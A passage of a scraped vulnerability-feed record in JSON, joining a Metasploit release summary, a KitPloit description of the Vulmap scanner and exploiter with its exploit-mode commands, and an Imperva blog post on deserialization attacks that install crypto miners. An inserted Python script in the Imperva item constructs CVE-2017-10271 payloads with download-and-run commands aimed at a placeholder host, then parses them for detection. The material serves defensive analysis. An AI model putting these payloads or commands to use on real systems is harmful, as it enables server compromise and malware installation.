An auth bypass for Artica Proxy by [Niboucha Redouane](<https://github.com/red0xff>), Cloud Camera command injection by Pietro Oliva, VyOS escape by Rich Mirch and [bcoles](<https://github.com/bcoles>), and a SecureCRT password decryptor by cn-kali-team.\n\n## New modules (9)\n\n * [Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14025>) by Max0x4141 and Redouane NIBOUCHA, which exploits [CVE-2020-17506](<https://attackerkb.com/topics/TIR8HEspsz/cve-2020-17506?referrer=blog>)\n * [Jenkins CLI Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14122>) by SSD, Shelby Pace, and Unknown, which exploits [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=blog>)\n * [TP-Link Cloud Cameras NCXXX Bonjour Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14135>) by Pietro Oliva, which exploits [CVE-2020-12109](<https://attackerkb.com/topics/TTBzMpfHr2/cve-2020-12109?referrer=blog>)\n * [VyOS restricted-shell Escape and Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/14123>) by Rich Mirch and bcoles, which exploits [CVE-2018-18556](<https://attackerkb.com/topics/75ZrO8GTzs/cve-2018-18556?referrer=blog>)\n * [Microsoft Spooler Local Privilege Elevation Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14023>) by Alex Ionescu, Yarden Shafir, bwatters-r7, and shubham0d, which exploits [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>)\n * [Netlogon Weak Cryptographic Authentication](<https://github.com/rapid7/metasploit-framework/pull/14151>) by Dirk-jan Mollema, Spencer McIntyre, and Tom Tervoort, which exploits [CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog>)\n * [SOCKS Proxy 
Server](<https://github.com/rapid7/metasploit-framework/pull/14173>) by Spencer McIntyre, sf, and surefire\n * [Multiplatform Installed Software Version Enumerator](<https://github.com/rapid7/metasploit-framework/pull/14140>) by gwillcox-r7\n * [Windows SecureCRT Session Information Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14118>) by HyperSine and Kali-Team\n\n## Bugs fixed\n\n * [Show correct rank for show exploits command](<https://github.com/rapid7/metasploit-framework/pull/14176>) from [Alan David Foster](<https://github.com/adfoster-r7>) fixes a bug where the ranking for exploits was not shown properly when the `show exploits` command was used.\n * [Always display `SRVHOST` and `SRVPORT` options when `CMDSTAGER::FLAVOR` is set to `auto`](<https://github.com/rapid7/metasploit-framework/pull/14153>) from [Christophe](<https://github.com/cdelafuente-r7>) fixes a bug where the SRVPORT and SRVHOST parameters are not displayed properly if the command stager flavor is set to `auto`\n * [Fix is_known_pipename module](<https://github.com/rapid7/metasploit-framework/pull/14035>) also from Christophe fixes an issue in the is_known_pipename exploit module which targets samba. There was an incorrect SMB version 1 data structure definition that was causing the module to fail to verify a writeable directory.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog \npost from GitHub:\n\n * [Pull Requests 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-09-17T11%3A03%3A21-05%3A00..2020-09-24T11%3A12%3A08-05%3A00%22>)\n * [Full diff 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/compare/6.0.7...6.0.8>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>)(master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-09-25T18:54:14", "published": "2020-09-25T18:54:14", "id": "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "href": "https://blog.rapid7.com/2020/09/25/metasploit-wrap-up-80/", "type": "rapid7blog", "title": "Metasploit Wrap-up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-12-25T15:23:36", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9791", "CVE-2020-2551", "CVE-2019-6340", "CVE-2011-3923", "CVE-2018-7600", "CVE-2013-1966", "CVE-2020-14882", "CVE-2020-2883", "CVE-2018-2894", "CVE-2018-20062", "CVE-2010-1428", "CVE-2019-7238", "CVE-2017-3506", "CVE-2013-2251", "CVE-2014-4210", "CVE-2017-12629", "CVE-2020-10199", "CVE-2019-0193", "CVE-2018-7602", "CVE-2015-7501", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2017-12615", "CVE-2019-0230", "CVE-2010-1870", "CVE-2016-4437", "CVE-2017-9805", "CVE-2020-2729", "CVE-2013-2134", "CVE-2020-1938", "CVE-2019-9082", "CVE-2019-2725", "CVE-2010-0738", "CVE-2018-1000861", "CVE-2019-17558", "CVE-2017-1000353", "CVE-2016-3081", "CVE-2020-2555", "CVE-2019-2729"], "description": "[  ](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists. 
\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select the mode; poc is the default. In poc mode it also supports \"-f\" batch target scanning, \"-o\" file output of results and other main functions; for the rest see [ Options ](<https://github.com/zhzyker/vulmap/#options>) or run python3 vulmap.py -h. In exp mode the poc check is skipped: the exploit is carried out directly, and its result is fed back to further verify whether the vulnerability exists and whether it can be exploited. \n\n** Try to use \"-a\" to specify the target type to reduce false positives, for example \"-a solr\" **\n\n \n\n\n### Installation \n\nThe operating system must have python3; python3.7 or higher is recommended \n\n * Install dependencies \n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows \n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options \n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, one URL per line (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. default is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. 
-o \"result.txt\")\n \n\n \n\n\n### Examples \n\nTest all vulnerabilities poc mode \n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command \n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck [ http://example.com ](<http://example.com>) for struts2 vuln \n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on [ http://example.com:7001 ](<http://example.com:7001>)\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt \n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt \n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List \n\nVulmap supported vulnerabilities are as follows \n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, 
cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability 
|\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker \n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n** [ Download Vulmap ](<https://github.com/zhzyker/vulmap> 
\"Download Vulmap\" ) **\n", "edition": 1, "modified": "2020-12-25T11:30:06", "published": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. 
In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. 
In Java, for example, an object is converted into a compact byte-stream representation, and that byte stream can later be turned back into a copy of the object.\n\nOther types of serialization include converting an object into a hierarchical text format like JSON or XML. The advantage of these formats is that the serialized objects can be read as plain text instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>), and rightfully so, as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure deserialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805 | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. 
\nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | 
Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 
| IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. 
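To make the structural point concrete, here is an added example (Python; not code from the original post) that parses a constructed WLS-WSAT style request, recovers the java/void/array/void/string path, and flags the command-execution class. It goes a step beyond the figure by running the same check over a Windows-style argv and over a benign SOAP request, to show that the structural signature, not the command text, is what to match on. The SOAP/WorkContext wrapper follows the publicly documented shape of this vector; the hostnames, commands and the COMMAND_CLASSES list are assumptions made for the example.

```python
"""Dissect a WLS-WSAT style XML object payload (the CVE-2017-10271 vector
shown in Figure 5) and flag the java/void/array/void/string structure.

Added example, not code from the original post. The SOAP/WorkContext
wrapper follows the publicly documented shape of this vector; hostnames
and commands are constructed placeholders."""
import xml.etree.ElementTree as ET

# Classes whose presence in an XML object graph means "run a command".
COMMAND_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}


def wrap_process_builder(argv):
    """Constructed sample: a ProcessBuilder fed a String[] argv through the
    XML object representation, then started. Same structure for any OS;
    only the strings differ."""
    items = "".join(
        f'<void index="{i}"><string>{arg}</string></void>' for i, arg in enumerate(argv)
    )
    return f"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="{len(argv)}">{items}</array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""


# Linux-style download-and-run, as in Figure 5 (placeholder host).
LINUX_PAYLOAD = wrap_process_builder([
    "/bin/bash", "-c",
    "wget -q http://dropper.example.invalid/logo.jpg -O /tmp/logo.jpg; bash /tmp/logo.jpg",
])
# Windows-style equivalent, as in Figure 6 (placeholder host).
WINDOWS_PAYLOAD = wrap_process_builder([
    "cmd.exe", "/c",
    "powershell -c iwr http://dropper.example.invalid/logo.jpg -OutFile m.exe; .\\m.exe",
])
# Ordinary SOAP request with no <java> element: the control case.
BENIGN_SOAP = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body><getStatus xmlns="urn:example"><id>42</id></getStatus></soapenv:Body>
</soapenv:Envelope>"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def _collect(elem, path, classes, leaves):
    """Depth-first walk recording, for every <string> leaf, the element path
    from <java> down to it and the class= attributes seen on the way."""
    path = path + [_local(elem.tag)]
    cls = elem.get("class")
    if cls:
        classes = classes + [cls]
    if path[-1] == "string" and elem.text is not None:
        leaves.append(("/".join(path), tuple(classes), elem.text))
    for child in elem:
        _collect(child, path, classes, leaves)


def analyse(xml_text):
    """Return the paths, classes and string arguments found under any <java>
    element, plus the command-execution classes that make the body hostile."""
    root = ET.fromstring(xml_text)
    report = {"java_blocks": 0, "paths": [], "classes": set(), "argv": []}
    for elem in root.iter():
        if _local(elem.tag) != "java":
            continue
        report["java_blocks"] += 1
        leaves = []
        _collect(elem, [], [], leaves)
        for path, classes, text in leaves:
            report["paths"].append(path)
            report["classes"].update(classes)
            report["argv"].append(text)
    report["flagged"] = sorted(report["classes"] & COMMAND_CLASSES)
    return report


if __name__ == "__main__":
    for name, body in (("linux", LINUX_PAYLOAD), ("windows", WINDOWS_PAYLOAD), ("benign", BENIGN_SOAP)):
        r = analyse(body)
        print(f"{name:8s} flagged={r['flagged']} paths={sorted(set(r['paths']))} argv={r['argv']}")
```

Matching on the element path plus the `class` attribute catches both operating-system variants with one rule, whereas a signature on "wget" or "cmd.exe" would miss the next rewording of the command.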
Once the downloaded script runs, the server is infected with crypto-mining malware that mines Monero (a cryptocurrency similar to Bitcoin).

The next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload targets Windows servers, using cmd.exe and PowerShell commands to download the malware and run it.

![Figure 6: Attack vector trying to infect a Windows server with crypto-mining malware](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png)

_Figure 6: Attack vector trying to infect a Windows server with crypto-mining malware_

This indicates that there are two different infection methods, one for Windows servers and one for Linux servers, each with its own script.

Another example is the following payload (Figure 7), which we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.

![Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg)

_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_

The apparently garbled bytes are not an encoding error; they are how Java serialization lays out the object graph (stream header, class descriptors, field data) in the byte stream.

Still, a script can be seen in plain text, marked in yellow. The image below highlights the use of the shell's internal field separator variable (IFS), which here simply stands in for a space. The variable is most likely used instead of literal spaces to make the payload harder to match with simple signatures.

![IFS variable used in place of spaces](https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg)

Just as in the previous examples, this Bash script targets Linux servers and sends an HTTP request using "wget" to download a crypto miner.

## Beyond Insecure Deserialization

The common denominator of the attacks above is that attackers are trying to infect the server with crypto-mining malware by exploiting an insecure deserialization vulnerability. However, insecure deserialization is not the only way to achieve this goal.

Below (Figure 8) we see an example of another attack payload, this time carried in the "Content-Type" header.

![Figure 8: Attack vector using an RCE vulnerability of Apache Struts](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg)

_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_

This attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability in Apache Struts that was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).

When it was originally published we saw no indications of crypto miners in the payloads related to this CVE; most of them were reconnaissance attacks.

In this attack, however, the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infects the server with crypto-mining malware.

